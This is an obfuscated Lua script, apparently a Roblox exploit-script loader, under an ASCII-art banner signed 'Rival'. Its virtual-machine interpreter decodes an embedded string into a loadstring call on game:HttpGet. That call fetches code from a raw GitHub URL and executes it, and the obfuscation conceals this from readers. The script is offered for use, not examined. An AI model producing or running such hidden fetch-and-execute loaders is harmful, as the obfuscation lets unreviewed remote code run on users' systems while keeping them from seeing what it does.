--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_                     
                                      Smh Skids These Days | By Rival#0003

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=getfenv or function()return _ENV;end;local v9=setmetatable;local v10=pcall;local v11=select;local v12=unpack or table.unpack;local v13=tonumber;local function v14(v15,v16)local v17=0;local v18;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;while true do if (v17==7) then function v29(v30,v31,v32)local v38=v30[1];local v39=v30[2];local v40=v30[3];return function(...)local v65=1;local v66= -1;local v67={...};local v68=v11("#",...) -1;local function v69()local v73=v38;local v74=Const;local v75=v39;local v76=v40;local v77=v27;local v78={};local v79={};local v80={};for v87=(0 -0) -(656 -(45 + 611)),v68 do if (((1666 -(56 + 2))<=(2766 -((1286 -(458 + 693)) + 376))) and (v87>=v76)) then v78[v87-v76]=v67[v87 + 1 + 0];else v80[v87]=v67[v87 + (1134 -(255 + 878)) + (334 -(7 + 327))];end end local v81=(v68-v76) + (2 -1);local v82;local v83;while true do local v88=(81 -(39 + 42)) -0;local v89;while true do if ((v88==(0 -(0 -0))) or ((4431 -(402 + 325))<=1977)) then v89=(0 -0) -(0 + 0);while true do if (((1857 -(231 + 221))>(36 -20)) and (v89==(0 + 0))) then local v99=0 + 0;while true do if (((8983 -5979)<=(2845 + 2006)) and ((179 -(89 + 89))==v99)) then v89=1 -0;break;end if ((v99==(0 -0)) or ((1376 + 535)==(2121 -676))) then v82=v73[v65];v83=v82[393 -(158 + 234)];v99=4 -3;end end end if ((v89==1) or ((10928 -6421)<=(403 -177))) then if (((4444 -2653)>(278 + 1068)) and (v83<=((30 -21) -7))) then if ((3439==(6537 -3098)) and (v83<=(1541 -(218 + 1323)))) then v80[v82[2]]();elseif ((v83>((425 -(225 + 197)) -2)) or ((370 + 4295)<(1195 -904))) then v80[v82[1 + 1]]=v82[2 + 0 + 1];else local v102=0 -0;local v103;local v104;local v105;local v106;while true do if ((((205 + 10780) -7100)>=(4244 -(926 + (1765 -1003)))) and (v102==(2 + 0))) then while true do if (((17723 -13502)>=(4284 -(799 + 60))) and (v103==0)) then local v124=0 -0;while true do if (((86 + 1939)==(3768 -(1584 + 159))) and (v124==1)) then v103=141 -(63 + 77);break;end if ((v124==(0 + 0)) or ((1702 + 781)<=(2760 -(183 + (2838 -(163 + 1202)))))) then v104=(1119 + 166) -(604 + 681);v105=nil;v124=(1145 -(699 + 445)) + 0;end end end if ((v103==(264 -(174 + 89))) or ((6716 -4098)<(2396 -1463))) then v106=nil;while true do if ((v104==(0 -0)) or ((7892 -4541)<=(3940 -2226))) then local v133=0 + 0;local v134;while true do if ((v133==(0 + 0)) or ((2676 -(677 + 205))>=(17274 -13667))) then v134=0 -0;while true do if ((v134==(1030 -(748 + 282))) or ((2074 -766)>(6099 -2336))) then local v144=1024 -(70 + 954);while true do if (((2119 + (2738 -(312 + 268)))<(6526 -(598 + 509 + 804))) and (v144==(0 -0))) then v105=v82[3 -1];v106=v80[v82[1706 -(1078 + 625)]];v144=1 -0;end if ((v144==(2 -(1 -0))) or ((4409 -(898 + 132 + 244))<=(659 -430))) then v134=1;break;end end end if (((792 -(314 + 14))<=((5158 + 1989) -2308)) and (v134==(1 + 0))) then v104=1 + 0;break;end end break;end end end if ((v104==(1376 -(1247 + 128))) or ((1204 -(21 + 18))==1232)) then v80[v105 + 1 + 0]=v106;v80[v105]=v106[v82[1165 -(996 + 165)]];break;end end break;end end break;end if (((2346 -1100)<=(240 + 4024)) and (v102==(216 -(57 + 158)))) then v105=nil;v106=nil;v102=7 -5;end if (((3523 -2117)<=(12585 -8487)) and (v102==(0 + 0))) then v103=0 + 0 + 0;v104=nil;v102=(49 -(23 + 24)) -1;end end end elseif (((4685 -(116 + 57))==(15167 -10655)) and (v83<=(10 -6))) then if ((v83>(3 + 0)) or ((712 -(652 -258))<(284 -51))) then local v107=(6903 -5144) -(99 + 1660);local v108;local v109;while true do if (((6317 -(1632 + 338))>(7263 -5256)) and (v107==((1288 -(27 + 1258)) -2))) then while true do if ((v108==(0 -0)) or ((338 + 2)==((2951 + 2036) -3249))) then v109=v82[2];v80[v109]=v80[v109](v12(v80,v109 + 1 + 0,v66));break;end end break;end if ((v107==(1457 -(1146 + 311))) or ((7622 -6029)<(689 -(19 + 4)))) then v108=1442 -(433 + 1009);v109=nil;v107=2 -1;end end else local v110=1578 -(1104 + 474);local v111;local v112;local v113;local v114;local v115;while true do if (((1 + 0)==v110) or ((149 + 550)<(1592 -1096))) then v113=nil;v114=nil;v110=2 -0;end if ((v110==0) or ((4742 -(983 + 853))>(12763 -(22709 -13771)))) then v111=1313 -(205 + (1758 -650));v112=nil;v110=1 + 0 + 0;end if (((5188 -3246)<(9127 -5834)) and (v110==(1 + 1))) then v115=nil;while true do if (((188 + 184)<(1868 + 457)) and ((335 -(328 + 7))==v111)) then v112=v82[4 -2];v113,v114=v77(v80[v112](v12(v80,v112 + (231 -(215 + 15)),v82[2 + 1])));v111=3 -2;end if (((658 + 3124)<=(6593 -2610)) and (v111==1)) then v66=(v114 + v112) -1;v115=1621 -(1324 + 297);v111=1175 -(132 + 1041);end if ((v111==(4 -2)) or ((298 + 20)<(1917 -(1032 + 634)))) then for v126=v112,v66 do local v127=0 + 0;local v128;while true do if ((0==v127) or ((2125 + 2617)<(1981 -1192))) then v128=0 -0;while true do if (((2067 -1454)==(705 -(21 + 71))) and (((0 -0) + 0)==v128)) then v115=v115 + 1 + 0;v80[v126]=v113[v115];break;end end break;end end end break;end end break;end end end elseif ((v83>(22 -17)) or ((19079 -14315)<((1939 + 682) -(552 + 100)))) then do return;end else v80[v82[235 -(174 + 59)]]=v32[v82[(1 + 2) -(37 -(13 + 24))]];end v65=v65 + 1;break;end end break;end end end end A,B=v27(v10(v69));if  not A[1] then local v84=v30[4][v65] or "?";error("Script error at ["   .. v84   .. "]:"   .. A[2]);else return v12(A,2,B);end end;end return v29(v28(),{},v16)();end if (v17==2) then function v21()local v41=v1(v15,v18,v18);v18=v18 + 1;return v41;end v22=nil;function v22()local v42,v43=v1(v15,v18,v18 + 2);v18=v18 + (1094 -(660 + 432));return (v43 * (1840 -(949 + 635))) + v42;end v17=3;end if (v17==3) then v23=nil;function v23()local v44=0 + 0;local v45;local v46;local v47;local v48;while true do if (v44==(2 -1)) then return (v48 * (50179271 -33402055)) + (v47 * 65536) + (v46 * (1144 -888)) + v45;end if (v44==(0 + 0)) then v45,v46,v47,v48=v1(v15,v18,v18 + 2 + 1);v18=v18 + ((13 + 1) -10);v44=1 + 0;end end end v24=nil;v17=4;end if (v17==6) then v28=nil;function v28()local v49=0;local v50;local v51;local v52;local v53;local v54;local v55;local v56;local v57;while true do if (v49==(1 -0)) then v52=nil;v53=nil;v49=70 -(21 + 47);end if (v49==(153 -(21 + 129))) then v56=nil;v57=nil;v49=4;end if (v49~=2) then else v54=nil;v55=nil;v49=3;end if (v49~=(192 -(40 + 152))) then else v50=1672 -(295 + 1377);v51=nil;v49=385 -(243 + 141);end if (v49~=(1734 -(362 + 1368))) then else while true do if (0==v50) then local v90=1441 -(1346 + 95);while true do if (v90==(0 + 0)) then v51=0 + 0;v52=nil;v90=1 + 0;end if (v90==(553 -(321 + 231))) then v50=1;break;end end end if (v50~=(1132 -(481 + 649))) then else local v91=0 -0;local v92;while true do if (v91~=(0 -0)) then else v92=0 + 0;while true do if (v92~=(1 + 0)) then else v50=1 + 2;break;end if (v92~=(86 -(45 + 41))) then else local v100=0 + 0;while true do if (v100~=(0 + 0)) then else v55=nil;v56=nil;v100=297 -(253 + 43);end if (v100==(412 -(53 + 358))) then v92=1 -0;break;end end end end break;end end end if (v50~=(6 -3)) then else v57=nil;while true do local v96=0;local v97;local v98;while true do if (v96==0) then v97=609 -(134 + 475);v98=nil;v96=1 + 0;end if (v96==(1871 -(569 + 1301))) then while true do if (v97==0) then v98=0;while true do if (v98~=(0 -0)) then else if (v51~=(2 + 0)) then else local v117=1225 -(880 + 345);local v118;local v119;while true do if (v117==(0 -0)) then v118=0 + 0;v119=nil;v117=1 -0;end if (v117~=(1 + 0)) then else while true do if (0==v118) then v119=0;while true do local v131=0;local v132;while true do if ((0 + 0)~=v131) then else v132=0 + 0;while true do if (0~=v132) then else if (v119==(1810 -(966 + 843))) then local v145=1755 -(1712 + 43);local v146;while true do if (v145~=(0 -0)) then else v146=0 + 0;while true do if (v146~=(1035 -(959 + 76))) then else local v155=661 -(479 + 182);while true do if (v155==(780 -(26 + 754))) then for v161=2 -1,v23() do v54[v161]=v23();end return v55;end end end end break;end end end if ((373 -(41 + 332))==v119) then local v147=0;while true do if (v147~=(1 -0)) then else v119=325 -(201 + 123);break;end if (v147~=0) then else for v150=1,v23() do local v151=0 + 0;local v152;while true do if (v151~=0) then else v152=v21();if (v20(v152,1,1777 -(397 + 1379))==0) then local v156=0 + 0;local v157;local v158;local v159;local v160;while true do if (v156~=(1599 -(129 + 1470))) then else local v163=0 + 0;while true do if (v163~=(91 -(5 + 86))) then else v157=0;v158=nil;v163=3 -2;end if (v163==(2 -1)) then v156=1 + 0;break;end end end if (v156~=(1 -0)) then else local v164=0;while true do if (v164~=(1 + 0)) then else v156=1 + 1;break;end if ((317 -(241 + 76))~=v164) then else v159=nil;v160=nil;v164=338 -(276 + 61);end end end if (v156~=2) then else while true do if (v157~=(1836 -(295 + 1539))) then else local v165=0;local v166;while true do if (v165==(0 + 0)) then v166=1214 -(479 + 735);while true do if (v166~=0) then else if (v20(v159,1322 -(56 + 1265),1 -0)~=1) then else v160[2]=v57[v160[85 -(27 + 56)]];end if (v20(v159,7 -5,1592 -(1035 + 555))==(1 + 0)) then v160[3]=v57[v160[3 + 0]];end v166=2 -1;end if (v166~=1) then else v157=3;break;end end break;end end end if (v157~=(1 -0)) then else v160={v22(),v22(),nil,nil};if (v158==(0 -0)) then local v168=0;while true do if (v168~=(0 -0)) then else v160[1872 -(757 + 1112)]=v22();v160[9 -5]=v22();break;end end elseif (v158==(2 -1)) then v160[6 -3]=v23();elseif (v158==(1149 -(51 + 1096))) then v160[3 + 0]=v23() -((1 + 1)^(760 -(182 + 562)));elseif (v158==3) then local v176=0 -0;local v177;local v178;local v179;while true do if (v176~=(1 + 0)) then else v179=nil;while true do if (v177==(1 -0)) then while true do if ((1068 -(479 + 589))==v178) then v179=270 -(184 + 86);while true do if (v179~=(0 -0)) then else v160[13 -10]=v23() -((2 + 0)^16);v160[5 -1]=v22();break;end end break;end end break;end if ((773 -(626 + 147))==v177) then v178=0 + 0;v179=nil;v177=3 -2;end end break;end if (v176==0) then v177=0 -0;v178=nil;v176=3 -2;end end end v157=1 + 1;end if (v157~=3) then else if (v20(v159,12 -9,3 + 0)~=(1281 -(969 + 311))) then else v160[875 -(595 + 276)]=v57[v160[2 + 2]];end v52[v150]=v160;break;end if (v157~=(0 + 0)) then else v158=v20(v152,2,10 -7);v159=v20(v152,4 + 0,6);v157=4 -3;end end break;end end end break;end end end for v153=1 + 0,v23() do v53[v153-(1 + 0)]=v28();end v147=3 -2;end end end break;end end break;end end end break;end end break;end end end if (v51~=(0 -0)) then else local v120=1816 -(1782 + 34);local v121;while true do if (0==v120) then v121=0 + 0;while true do if (v121==(5 -3)) then v51=1 + 0;break;end if (v121~=(0 + 0)) then else v52={};v53={};v121=1 + 0;end if (v121==1) then local v129=0 + 0;while true do if (v129==(0 + 0)) then v54={};v55={v52,v53,nil,v54};v129=1;end if ((1961 -(1631 + 329))==v129) then v121=2 + 0;break;end end end end break;end end end v98=555 -(212 + 342);end if (v98==(1241 -(800 + 440))) then if (v51==1) then local v122=0 -0;local v123;while true do if (v122~=(570 -(512 + 58))) then else v123=0 -0;while true do if (v123==(1 + 0)) then local v130=1832 -(775 + 1057);while true do if ((0 + 0)~=v130) then else for v138=1990 -(724 + 1265),v56 do local v139=0;local v140;local v141;local v142;while true do if (v139==(967 -(829 + 138))) then v140=0 + 0;v141=nil;v139=1 + 0;end if ((624 -(168 + 455))==v139) then v142=nil;while true do if ((1 + 0)==v140) then if (v141==(1 + 0)) then v142=v21()~=(0 -0);elseif (v141==2) then v142=v24();elseif (v141==(1771 -(739 + 1029))) then v142=v25();end v57[v138]=v142;break;end if (v140==0) then local v149=0 + 0;while true do if (v149~=(0 + 0)) then else v141=v21();v142=nil;v149=1;end if (v149==(1 + 0)) then v140=1561 -(1442 + 118);break;end end end end break;end end end v55[3 + 0]=v21();v130=1030 -(511 + 518);end if ((1502 -(1295 + 206))~=v130) then else v123=3 -1;break;end end end if (v123==(1243 -(1175 + 68))) then v56=v23();v57={};v123=1 + 0;end if (v123~=(1 + 1)) then else v51=1058 -(580 + 476);break;end end break;end end end break;end end break;end end break;end end end break;end if ((1 -0)==v50) then local v93=1649 -(63 + 1586);while true do if (v93~=(0 -0)) then else v53=nil;v54=nil;v93=1;end if ((1 + 0)~=v93) then else v50=7 -5;break;end end end end break;end end end v29=nil;v17=7;end if (v17==4) then function v24()local v58=474 -(409 + (385 -(288 + 32)));local v59;local v60;while true do if (v58==(0 -0)) then v59=v23();v60=v23();v58=1079 -(175 + 903);end if (v58==(3 -2)) then return (( -(1 + 1) * v20(v60,(1963 -(683 + 81)) -(387 + 780))) + 1) * ((3 -1)^(v20(v60,53 -(16 + 16),934 -(544 + 359)) -((4806 -(683 + 273)) -2827))) * ((((v20(v60,32 -(20 + 11),1762 -(963 + 779)) * ((2 + 0)^(11 + 21))) + v59)/((1834 -(1830 + 2))^(162 -110))) + (1392 -(863 + 528)));end end end v25=nil;function v25(v33)local v61;if  not v33 then v33=v23();if (v33==(1393 -(239 + 1154))) then return "";end end v61=v3(v15,v18,(v18 + v33) -(1 -0));v18=v18 + v33;local v62={};for v63=606 -(207 + 398), #v61 do v62[v63]=v2(v1(v3(v61,v63,v63)));end return v6(v62);end v17=5;end if (1==v17) then v20=nil;function v20(v34,v35,v36)if v36 then local v70=(v34/((1 + 1)^(v35-(1894 -(1305 + (2099 -(108 + 1403)))))))%((1 + 1)^(((v36-(1 + 0)) -(v35-((1347 -(262 + 1084)) + 0 + 0))) + (1 -(0 -0))));return v70-(v70%1);else local v71=(1 + 1)^(v35-(610 -(132 + 477)));return (((v34%(v71 + v71))>=v71) and (1 + 0)) or 0;end end v21=nil;v17=2;end if (v17==0) then v18=1;v19=nil;v15=v4(v3(v15,5),"..",function(v37)if (v1(v37,2)==79) then v19=v0(v3(v37,1,1));return "";else local v72=v2(v0(v37,16));if v19 then local v85=0;local v86;while true do if (v85==0) then v86=v5(v72,v19);v19=nil;v85=1;end if (v85==1) then return v86;end end else return v72;end end end);v17=1;end if (v17==5) then v26=v23;v27=nil;function v27(...)return {...},v11("#",...);end v17=6;end end end v14("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574033E3O0027682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F536C2O72732F79756E2E78797A2F6D61696E2F6279726976616C2700083O0012053O00013O001205000100023O002001000100010003001202000300044O0003000100034O00045O00026O000100012O00063O00017O00083O00023O00023O00023O00023O00023O00023O00023O00033O00",v8());end
